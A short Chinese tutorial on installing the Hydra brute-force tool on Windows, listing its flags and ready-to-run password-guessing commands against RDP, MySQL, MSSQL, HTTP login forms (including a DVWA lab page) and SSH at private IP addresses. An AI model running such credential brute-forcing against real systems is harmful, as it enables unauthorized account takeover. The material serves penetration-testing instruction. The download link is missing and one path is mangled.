Hydra安装及其用法（Windows版）

介绍

Hydra对应的英文意思是九头蛇，它是一款爆破神器，可以对多种服务的账号和密码进行爆破，包括Web登录、数据库、SSH、FTP等服务，支持、Windows、Mac平台安装，其中Kali Linux中自带Hydra。

Windows中Hydra安装

Hydra官方不支持Windows版，需要在GitHub上下载，地址为：

下载之后解压缩即可。

解压安装即可，然后使用命令行（cmd）切到安装目录，例如：cd D: hc-hydra-windows-master>

然后输入hydra.exe回车，出现以下提示说明安装成功。（注意：以后使用hydra都要切到安装目录才可以使用）

hydra -L 账户字典

-l 单个账户名

-p 单个密码

-P 密码字典

hydra爆破rdp：（前提是目标的远程连接可以访问）

hydra -l Administrator -P password.txt rdp://192.168.1.111

hydra爆破mysql:（前提是目标的mysql可远程访问）

hydra -l root -P password.txt 192.168.1.111 mysql

hydra爆破sql server:（前提是目标的mysql可远程访问）

hydra -l sa -P password.txt 192.168.1.111 mssql

hydra爆破http：( http-get or http-form-post.)

hydra -l admin -P password.txt 192.168.1.111 http-get /login.php

hydra -l admin -P password.txt 192.168.213.135 http-form-post "/dvwa/login.php:user=^USER^&pass=^PASS^:<title>invalide</title"

【注】（user,pass改为账户密码提交表单<label for="">的值）

hydra爆破ssh：( 前提是目标的远程连接可以访问)

hydra -l root -P password.txt 192.168.1.111 ssh

注意事项：

1、字典路径为全英文且不能空格；

2、做测试的时候要确保目标可访问；

3、所有符号均为英文状态下输入；